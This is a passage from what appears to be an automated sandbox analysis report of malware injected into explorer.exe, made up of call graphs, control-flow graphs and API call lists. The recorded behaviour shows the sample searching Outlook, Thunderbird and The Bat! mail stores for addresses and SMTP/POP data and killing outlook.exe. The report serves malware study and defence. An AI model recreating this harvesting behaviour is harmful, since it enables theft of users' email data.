1008->966 1010 8255c 16 API calls 1009->1010 1011 811e6 1010->1011 1012 8255c 16 API calls 1011->1012 1013 811f3 1012->1013 1014 8255c 16 API calls 1013->1014 1015 81200 1014->1015 1016 8255c 16 API calls 1015->1016 1017 8120d 1016->1017 1018 8255c 16 API calls 1017->1018 1019 8121a 1018->1019 1020 8255c 16 API calls 1019->1020 1021 81227 1020->1021 1022 8255c 16 API calls 1021->1022 1023 81234 1022->1023 1023->979 1025 8255c 16 API calls 1024->1025 1026 811ac 1025->1026 1027 8255c 16 API calls 1026->1027 1028 811b9 1027->1028 1029 8255c 16 API calls 1028->1029 1030 811c6 1029->1030 1030->982 1031->997 1033 81249 1032->1033 1034 82765 Process32First 1032->1034 1033->1005 1035 827ae 1034->1035 1036 8277f lstrcmpi 1035->1036 1037 827b2 CloseHandle 1035->1037 1038 827a0 Process32Next 1036->1038 1039 82795 1036->1039 1037->1033 1038->1035 1041 827be OpenProcess 1039->1041 1042 827e0 1041->1042 1043 827d0 TerminateProcess CloseHandle 1041->1043 1042->1038 1043->1042 1048 82013 1049 82029 lstrlen 1048->1049 1050 82036 1048->1050 1049->1050 1059 829b7 GetProcessHeap RtlAllocateHeap 1050->1059 1052 8203e lstrcat 1053 8207a 1052->1053 1054 82073 lstrcat 1052->1054 1060 820a7 1053->1060 1054->1053 1057 82999 3 API calls 1058 8209d 1057->1058 1059->1052 1094 82415 1060->1094 1064 820d4 1099 82938 lstrlen MultiByteToWideChar 1064->1099 1066 820e3 1100 824cc RtlZeroMemory 1066->1100 1069 82135 RtlZeroMemory 1071 8216a 1069->1071 1070 82999 3 API calls 1072 8208a 1070->1072 1073 823f7 1071->1073 1077 82198 1071->1077 1102 8243d 1071->1102 1072->1057 1073->1070 1075 823dd 1075->1073 1076 82999 3 API calls 1075->1076 1076->1073 1077->1075 1111 829b7 GetProcessHeap RtlAllocateHeap 1077->1111 1079 82268 wsprintfW 1080 8228e 1079->1080 1084 822fb 1080->1084 1112 829b7 GetProcessHeap RtlAllocateHeap 1080->1112 1082 822c8 wsprintfW 1082->1084 1083 823ba 1085 82999 3 API calls 1083->1085 1084->1083 1113 829b7 GetProcessHeap RtlAllocateHeap 1084->1113 1087 823ce 1085->1087 1087->1075 1088 82999 3 API calls 1087->1088 1088->1075 1089 82346 1090 823b3 1089->1090 1114 8296b VirtualAlloc 1089->1114 1091 82999 3 API calls 1090->1091 1091->1083 1093 823a0 RtlMoveMemory 1093->1090 1095 820c6 1094->1095 1096 8241f 1094->1096 1098 829b7 GetProcessHeap RtlAllocateHeap 1095->1098 1115 82818 lstrlen lstrlen 1096->1115 1098->1064 1099->1066 1101 820f3 1100->1101 1101->1069 1101->1073 1103 824ab 1102->1103 1105 8244a 1102->1105 1103->1077 1104 8244e DnsQuery_W 1104->1105 1105->1103 1105->1104 1106 8248d DnsFree inet_ntoa 1105->1106 1106->1105 1107 824ad 1106->1107 1117 829b7 GetProcessHeap RtlAllocateHeap 1107->1117 1109 824b7 1118 82938 lstrlen MultiByteToWideChar 1109->1118 1111->1079 1112->1082 1113->1089 1114->1093 1116 82839 1115->1116 1116->1095 1117->1109 1118->1103 1044 89d24 1045 89caf 1044->1045 1046 89f00 VirtualProtect VirtualProtect 1045->1046 1047 89ec9 1045->1047 1046->1047 1047->1047 1127 818f4 CreateFileW 1128 81919 GetFileSize 1127->1128 1129 8196d 1127->1129 1130 81929 1128->1130 1131 81965 CloseHandle 1128->1131 1130->1131 1141 829b7 GetProcessHeap RtlAllocateHeap 1130->1141 1131->1129 1133 81936 ReadFile 1134 8194b 1133->1134 1135 8195d 1133->1135 1142 81c39 1134->1142 1136 82999 3 API calls 1135->1136 1138 81964 1136->1138 1138->1131 1141->1133 1155 829b7 GetProcessHeap RtlAllocateHeap 1142->1155 1144 81c50 RtlMoveMemory 1145 81e36 1144->1145 1149 81c65 1144->1149 1147 81db2 RtlMoveMemory RtlZeroMemory StrStrIA 1148 81deb StrStrIA 1147->1148 1147->1149 1148->1149 1150 81df7 StrStrIA 1148->1150 1149->1145 1151 82999 3 API calls 1149->1151 1156 829b7 GetProcessHeap RtlAllocateHeap 1149->1156 1157 81e44 1149->1157 1150->1149 1152 81e03 StrStrIA 1150->1152 1151->1149 1152->1149 1153 81e0f StrStrIA 1152->1153 1153->1149 1155->1144 1156->1147 1158 81e5b lstrlen CharLowerBuffA 1157->1158 1163 81ec7 1157->1163 1159 81e75 1158->1159 1161 81e9d 1158->1161 1160 81e7f lstrcmpi 1159->1160 1159->1161 1160->1159 1160->1163 1161->1163 1166 81ece StrStrIA 1161->1166 1163->1149 1165 82692 lstrlen RtlMoveMemory 1165->1163 1167 81ef5 RtlMoveMemory RtlMoveMemory StrStrIA 1166->1167 1168 81eb3 1166->1168 1167->1168 1169 81f37 StrStrIA 1167->1169 1168->1163 1168->1165 1169->1168 1170 81f4a StrStrIA 1169->1170 1170->1168 1171 81f5d lstrlen 1170->1171 1171->1168 1172 81f6a 1171->1172 1172->1168 1173 81f9b lstrlen 1172->1173 1173->1168 1173->1172 1174 89cf6 1176 89caf 1174->1176 1175 89ec9 1175->1175 1176->1174 1176->1175 1177 89f00 VirtualProtect VirtualProtect 1176->1177 1177->1175

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_00088F09 1 Function_0008170B 2 Function_0008490B 3 Function_0008380C 4 Function_00089B0E 5 Function_0008560F 6 Function_00081000 12 Function_00081016 6->12 7 Function_00082818 8 Function_00081810 9 Function_00084A10 10 Function_00082013 70 Function_00082999 10->70 82 Function_000820A7 10->82 88 Function_000829B7 10->88 11 Function_00082415 11->7 35 Function_0008104F 12->35 12->88 106 Function_000827E2 12->106 13 Function_00088816 14 Function_00088F16 15 Function_00082917 16 Function_00089028 17 Function_0008892B 18 Function_00088E2C 19 Function_0008992D 20 Function_00089420 21 Function_00082723 22 Function_00089823 23 Function_00089D24 24 Function_00082938 25 Function_00081C39 39 Function_00081E44 25->39 25->70 25->88 110 Function_00081FFB 25->110 26 Function_0008123A 32 Function_0008274A 26->32 42 Function_0008255C 26->42 27 Function_0008493B 28 Function_0008243D 28->24 28->88 29 Function_0008373E 30 Function_00089635 31 Function_00088F36 85 Function_000827BE 32->85 33 Function_00088B4C 34 Function_0008374D 35->26 35->70 72 Function_00081192 35->72 35->88 91 Function_000811CC 35->91 36 Function_00088F40 37 Function_00089040 38 Function_00089543 92 Function_00081ECE 39->92 111 Function_000826FC 39->111 40 Function_00088D46 41 Function_00083547 42->21 42->42 42->70 42->88 43 Function_0008295C 44 Function_0008185C 45 Function_0008875C 46 Function_00088A5F 47 Function_00088A50 48 Function_00088D52 49 Function_00088756 50 Function_00089456 51 Function_00089057 52 Function_00089169 53 Function_0008296B 54 Function_0008126E 54->1 54->8 54->25 54->44 64 Function_00081972 54->64 54->70 54->88 102 Function_000818EA 54->102 55 Function_0008946E 56 Function_00088961 57 Function_00088D61 58 Function_00088862 59 Function_00088B62 60 Function_00083565 61 Function_00082866 62 Function_00084A7A 63 Function_0008967E 64->15 64->39 64->70 64->88 64->110 65 Function_00088E77 66 Function_0008118F 66->42 67 Function_00088681 68 Function_00089182 69 Function_00083685 70->106 71 Function_0008949B 72->42 73 Function_000892AB 74 Function_000826AC 74->88 75 Function_000890AD 76 Function_000838AE 77 Function_000889AE 78 Function_000886A0 79 Function_00088EA4 80 Function_000891A5 81 Function_000834A6 82->11 82->24 82->28 82->53 82->61 82->70 82->88 90 Function_000824CC 82->90 83 Function_000838A7 84 Function_000899B8 86 Function_000886BE 87 Function_000887B5 89 Function_000895B7 91->42 92->110 93 Function_000888CE 94 Function_00088FC0 95 Function_000896C2 96 Function_00088DDB 97 Function_000854DC 98 Function_000848D6 99 Function_00084CD6 100 Function_00088ED6 101 Function_000897E8 103 Function_000887EB 104 Function_000836E0 105 Function_000887E1 107 Function_000890E5 108 Function_000894E6 109 Function_00088DF9 112 Function_000896FC 113 Function_00088AFD 114 Function_00088CFE 115 Function_00084AF0 116 Function_000835F2 117 Function_000818F4 117->25 117->64 117->70 117->88 118 Function_000848F4 119 Function_00088CF5 120 Function_00089CF6

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                    • lstrcatW.KERNEL32(00000000), ref: 00082588
                                    • PathAppendW.SHLWAPI(00000000,*.*), ref: 00082594
                                    • FindFirstFileW.KERNELBASE(00000000,?,?,000818F4), ref: 000825A8
                                    • RtlZeroMemory.NTDLL(00000209,00000209), ref: 000825C3
                                    • lstrcatW.KERNEL32(00000209,?), ref: 000825E1
                                    • PathAppendW.SHLWAPI(00000209,?), ref: 000825ED
                                    • lstrcatW.KERNEL32(00000209,?), ref: 00082611
                                    • PathAppendW.SHLWAPI(00000209,?), ref: 0008261D
                                    • StrStrIW.SHLWAPI(00000209,?), ref: 0008262C
                                    • FindNextFileW.KERNELBASE(00000000,?,?,000818F4), ref: 00082644
                                    • FindClose.KERNEL32(00000000,?,000818F4), ref: 00082653
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                    • String ID: *.*
                                    • API String ID: 1648349226-438819550
                                    • Opcode ID: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                    • Instruction ID: 9ab04f0758e8323f23007aef3f0b497425df495bdb796eec7b4485748527ddf8
                                    • Opcode Fuzzy Hash: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                    • Instruction Fuzzy Hash: C9217171204315AFE710BF209D589AFBBECFFC5B05F04051DFAD1A2251EB389A168B66

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 267 81016-81020 call 827e2 270 81022-81023 267->270 271 81024-81049 call 829b7 RtlMoveMemory NtUnmapViewOfSection call 8104f 267->271 275 8104e 271->275
                                    APIs
                                      • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                    • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0008103A
                                    • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081043
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                    • String ID:
                                    • API String ID: 1675517319-0
                                    • Opcode ID: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                    • Instruction ID: 55d5dd33b2f901c1089b15beaab3eab97d09ece425fd31eaa01e34cb85dd0178
                                    • Opcode Fuzzy Hash: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                    • Instruction Fuzzy Hash: 23D05E31800260B7EA657774BC1E9CA2A8CBF45730B254251B6E5961D3C9794A818B71

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                    • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008107F
                                    • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081093
                                    • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810A7
                                    • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000), ref: 000810BB
                                    • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810D3
                                    • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810E7
                                    • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810FB
                                    • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008110F
                                    • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081123
                                    • wsprintfA.USER32 ref: 0008116B
                                    • ExitProcess.KERNEL32 ref: 00081189
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                    • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                    • API String ID: 1709485025-1688604020
                                    • Opcode ID: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                    • Instruction ID: 4a2ba61a2a61d2de802517fd4c21c0c34be2e32a5e302aa0719222a3359143be
                                    • Opcode Fuzzy Hash: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                    • Instruction Fuzzy Hash: 7331937174022566EA5133654C1AFFF198DBF81FD4B050124F6C9DA2C3DE598E0387B6

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 65 8126e-81298 CreateFileW 66 816fb-81708 Sleep 65->66 67 8129e-812b0 GetFileSize 65->67 68 816f3-816fa CloseHandle 67->68 69 812b6-812bc 67->69 68->66 69->68 70 812c2-812d5 call 829b7 69->70 73 812db-812fc ReadFile 70->73 74 816f2 70->74 75 812fe-81301 73->75 76 8130f 73->76 74->68 77 816eb-816ed call 82999 75->77 78 81307-8130d 75->78 79 81315-8131b 76->79 77->74 78->79 80 81329-8134b SetFilePointer 79->80 81 8131d-8131f 79->81 80->77 84 81351-8135d 80->84 81->80 83 81321-81323 81->83 83->77 83->80 85 8136b-81372 84->85 86 8135f-81369 84->86 87 81374-8137f RtlMoveMemory 85->87 88 81381 85->88 86->87 89 81383-81394 87->89 88->89 90 8139d-813a1 89->90 91 81396-8139b 89->91 92 813a3-813db ReadFile 90->92 91->92 93 816db-816e5 92->93 94 813e1-813e9 92->94 93->77 93->84 95 813ef-813f7 94->95 96 81561-81569 94->96 97 816bc-816c9 95->97 98 813fd-81405 95->98 96->97 99 8156f-81577 96->99 97->94 101 816cf-816d7 97->101 98->97 100 8140b-81417 98->100 99->97 102 8157d-81589 99->102 103 81419-8141e 100->103 104 81420-81422 100->104 101->93 105 8158b-81590 102->105 106 81592-81594 102->106 103->104 104->97 107 81428-81441 call 818ea 104->107 105->106 106->97 108 8159a-815b3 call 818ea 106->108 113 816b8 107->113 115 81447-81458 call 8170b 107->115 108->113 114 815b9-815ca call 8170b 108->114 113->97 114->113 120 815d0-815d5 114->120 115->113 121 8145e-81468 115->121 120->113 122 815db-815ed 120->122 121->113 123 8146e-81480 121->123 124 815ff-81601 122->124 125 815ef-815fb call 8185c 122->125 126 81492-81494 123->126 127 81482-8148e call 8185c 123->127 131 81613-81619 124->131 132 81603-8160e call 81810 124->132 125->124 128 814a6-814ac 126->128 129 81496-814a1 call 81810 126->129 127->126 136 8154b-8155c call 81c39 128->136 137 814b2-814b9 128->137 129->128 140 8161f-81626 131->140 141 816a0-816ac call 81c39 131->141 132->131 155 816b1-816b3 call 81972 136->155 143 814bf-814c4 137->143 144 81542-81545 137->144 145 81628-8162d 140->145 146 8169b-8169e 140->146 141->155 149 814ca-814d3 143->149 150 814c6-814c8 143->150 144->113 144->136 151 8162f-81631 145->151 152 81633-8163c 145->152 146->113 146->141 149->113 156 814d9-814de 149->156 150->144 150->149 151->146 151->152 152->113 154 8163e-81643 152->154 154->113 157 81645-81652 154->157 155->113 156->113 159 814e4-814f1 156->159 160 81653-8166c 157->160 161 814f2-8150b 159->161 162 8166e-81671 160->162 163 8168f-81694 160->163 164 8150d-81510 161->164 165 8152e-81533 161->165 162->163 167 81673-8168b call 81c39 call 81972 162->167 163->160 168 81696 163->168 164->165 169 81512-8152a call 81c39 call 81972 164->169 165->161 166 81535-8153d 165->166 166->113 167->163 168->146 169->165
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00081289
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 000812A1
                                    • CloseHandle.KERNELBASE(00000000), ref: 000816F4
                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                    • ReadFile.KERNELBASE(00000000,00000000,00000400,?,00000000), ref: 000812E8
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008132D
                                    • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081379
                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000813B6
                                      • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                      • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                    • Sleep.KERNELBASE(00000064), ref: 000816FD
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: File$MemoryMove$HeapRead$AllocateCloseCreateHandlePointerProcessSizeSleep
                                    • String ID:
                                    • API String ID: 1032042679-0
                                    • Opcode ID: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                    • Instruction ID: 75e5417636b9bb59cc4e60b4fe32e97da451ac298a5a535e8d66e3deab824b36
                                    • Opcode Fuzzy Hash: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                    • Instruction Fuzzy Hash: 9DD1D2746082119BC764BF2888406FABBEABFC8760F48462DF8D597295E7308D53CB95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 178 8274a-82763 CreateToolhelp32Snapshot 179 827b9-827bd 178->179 180 82765-8277d Process32First 178->180 181 827ae-827b0 180->181 182 8277f-82793 lstrcmpi 181->182 183 827b2-827b3 CloseHandle 181->183 184 827a0-827a8 Process32Next 182->184 185 82795-8279b call 827be 182->185 183->179 184->181 185->184
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00082758
                                    • Process32First.KERNEL32(00000000,?), ref: 00082777
                                    • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008278B
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000827A8
                                    • CloseHandle.KERNELBASE(00000000), ref: 000827B3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                    • String ID: outlook.exe
                                    • API String ID: 868014591-749849299
                                    • Opcode ID: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                    • Instruction ID: 343884579346d2584715dea729d65f949d7c5dc94cdf17a98ebe8d79567dd670
                                    • Opcode Fuzzy Hash: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                    • Instruction Fuzzy Hash: 23F06230505128ABE720BB65DC49BEE77BCBB48B25F400190E9C9A2191EB388B544F95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 195 89cf6-89d10 196 89d15 195->196 197 89d16-89d28 196->197 199 89d2a 197->199 200 89d8e-89d8f 197->200 202 89d2c-89d36 199->202 203 89caf-89cbd 199->203 201 89d90-89d95 200->201 204 89d96-89d98 201->204 202->196 207 89d38-89d43 202->207 205 89cbf-89cce 203->205 206 89cd1-89cf4 203->206 208 89d9a-89d9f 204->208 209 89da1 204->209 205->206 206->195 210 89d44-89d4c 207->210 208->209 209->201 211 89da3 209->211 210->210 212 89d4e-89d50 210->212 213 89da8-89daa 211->213 214 89d79-89d88 212->214 215 89d52-89d55 212->215 216 89dac-89db1 213->216 217 89db3-89db7 213->217 214->200 214->208 215->197 218 89d57-89d75 215->218 216->217 217->213 221 89db9 217->221 219 89d7b-89d88 218->219 220 89f3d 218->220 219->208 220->220 222 89dbb-89dc2 221->222 223 89dc4-89dc9 221->223 222->213 222->223 224 89dd8-89dda 223->224 225 89dcb-89dd4 223->225 226 89ddc-89de1 224->226 227 89de3-89de7 224->227 228 89e4a-89e4d 225->228 229 89dd6 225->229 226->227 230 89de9-89dee 227->230 231 89df0-89df2 227->231 232 89e52-89e55 228->232 229->224 230->231 234 89e14-89e23 231->234 235 89df4 231->235 233 89e57-89e59 232->233 233->232 236 89e5b-89e5e 233->236 238 89e34-89e41 234->238 239 89e25-89e2c 234->239 237 89df5-89df7 235->237 236->232 240 89e60-89e7c 236->240 241 89df9-89dfe 237->241 242 89e00-89e04 237->242 238->238 243 89e43-89e45 238->243 239->239 244 89e2e 239->244 240->233 245 89e7e 240->245 241->242 242->237 246 89e06 242->246 243->204 244->204 247 89e84-89e88 245->247 248 89e08-89e0f 246->248 249 89e11 246->249 250 89e8a-89ea0 247->250 251 89ecf-89ed2 247->251 248->237 248->249 249->234 259 89ea1-89ea6 250->259 252 89ed5-89edc 251->252 253 89ede-89ee0 252->253 254 89f00-89f30 VirtualProtect * 2 252->254 256 89ee2-89ef1 253->256 257 89ef3-89efe 253->257 258 89f34-89f38 254->258 256->252 257->256 258->258 260 89f3a 258->260 259->247 261 89ea8-89eaa 259->261 260->220 262 89eac-89eb2 261->262 263 89eb3-89ec0 261->263 262->263 265 89ec9-89ecc 263->265 266 89ec2-89ec7 263->266 266->259
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_88000_explorer.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                    • Instruction ID: a463335449e91c4295caeb03356daa0005c9d69c2ec95bec009e1af8dcd402f7
                                    • Opcode Fuzzy Hash: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                    • Instruction Fuzzy Hash: 439137725193914FD726BE78CCC46B5BFE0FB52320B2C06A9D9D1CB386E7A4580AC764

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 276 829b7-829c7 GetProcessHeap RtlAllocateHeap
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID:
                                    • API String ID: 1357844191-0
                                    • Opcode ID: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                    • Instruction ID: 3c8c13ecdc887a9dfa87a418431857bd093085331a36a112817de6aaaa3d87e4
                                    • Opcode Fuzzy Hash: b9351f4542ec540c723d8288ffa8f1c93b00f39b480ad427a02778a4ffa0a27d
                                    • Instruction Fuzzy Hash: 1CA002B15503005BFD4457F5AE1EA157528B7D4B01F0045447385890549A6955148F21

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 284 82999-829a3 call 827e2 287 829b5-829b6 284->287 288 829a5-829af GetProcessHeap HeapFree 284->288 288->287
                                    APIs
                                      • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000209,00082664,?,000818F4), ref: 000829A8
                                    • HeapFree.KERNEL32(00000000,?,000818F4), ref: 000829AF
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcessQueryVirtual
                                    • String ID:
                                    • API String ID: 2580854192-0
                                    • Opcode ID: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                    • Instruction ID: 09411c8b402897cefff5f73e0440f262c5ce0b05ffcf0dbc953be38e067b1978
                                    • Opcode Fuzzy Hash: df64934d43702fa617687989b5c70bf43bb8b9b35f146b4e005b86ab177719a1
                                    • Instruction Fuzzy Hash: ACC02B3100433053DA6037743C1DBC63B0CBF8AB21F050082F9C1970418B6A8C018BB0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 289 81c39-81c5f call 829b7 RtlMoveMemory 292 81c65-81c6d 289->292 293 81e36-81e3c 289->293 294 81e2d-81e30 292->294 295 81c73-81c75 292->295 294->292 294->293 295->294 296 81c7b-81c80 295->296 296->294 297 81c86-81c8b 296->297 297->294 298 81c91-81c96 297->298 298->294 299 81c9c-81ca0 298->299 300 81cd2-81cd4 299->300 301 81ca2-81cae call 81ffb 299->301 300->294 302 81cda-81cf0 300->302 307 81cc9-81ccc 301->307 308 81cb0-81cb3 301->308 302->294 304 81cf6-81cfa 302->304 304->294 306 81d00-81d0b 304->306 310 81d0d 306->310 311 81d45-81d47 306->311 307->301 309 81cce 307->309 312 81cba-81cbd 308->312 313 81cb5-81cb8 308->313 309->300 315 81d11-81d1d call 81ffb 310->315 311->294 314 81d4d-81d56 311->314 312->307 316 81cbf-81cc2 312->316 313->307 313->312 317 81d58-81d5e 314->317 318 81d74 314->318 326 81d38-81d3b 315->326 327 81d1f-81d22 315->327 316->307 320 81cc4-81cc7 316->320 321 81d6e-81d72 317->321 322 81d60-81d67 call 81ffb 317->322 318->294 324 81d7a-81d81 318->324 320->307 320->309 321->318 322->321 334 81d69-81d6c 322->334 324->294 328 81d87-81d8a 324->328 326->315 329 81d3d-81d41 326->329 331 81d29-81d2c 327->331 332 81d24-81d27 327->332 328->294 333 81d90-81d99 328->333 329->311 331->326 335 81d2e-81d31 331->335 332->326 332->331 336 81e29 333->336 337 81d9f-81da2 333->337 334->317 334->321 335->326 338 81d33-81d36 335->338 336->294 337->336 339 81da8-81de9 call 829b7 RtlMoveMemory RtlZeroMemory StrStrIA 337->339 338->326 338->329 342 81deb-81df5 StrStrIA 339->342 343 81e22-81e24 call 82999 339->343 342->343 344 81df7-81e01 StrStrIA 342->344 343->336 344->343 346 81e03-81e0d StrStrIA 344->346 346->343 347 81e0f-81e19 StrStrIA 346->347 347->343 348 81e1b-81e1d call 81e44 347->348 348->343
                                    APIs
                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                    • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                    • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00081DBA
                                    • RtlZeroMemory.NTDLL(?,?), ref: 00081DD3
                                    • StrStrIA.SHLWAPI(00000000,from), ref: 00081DE5
                                    • StrStrIA.SHLWAPI(00000000,Blob), ref: 00081DF1
                                    • StrStrIA.SHLWAPI(00000000,Pop), ref: 00081DFD
                                    • StrStrIA.SHLWAPI(00000000,SMTP), ref: 00081E09
                                    • StrStrIA.SHLWAPI(00000000,.pst), ref: 00081E15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Memory$HeapMove$AllocateProcessZero
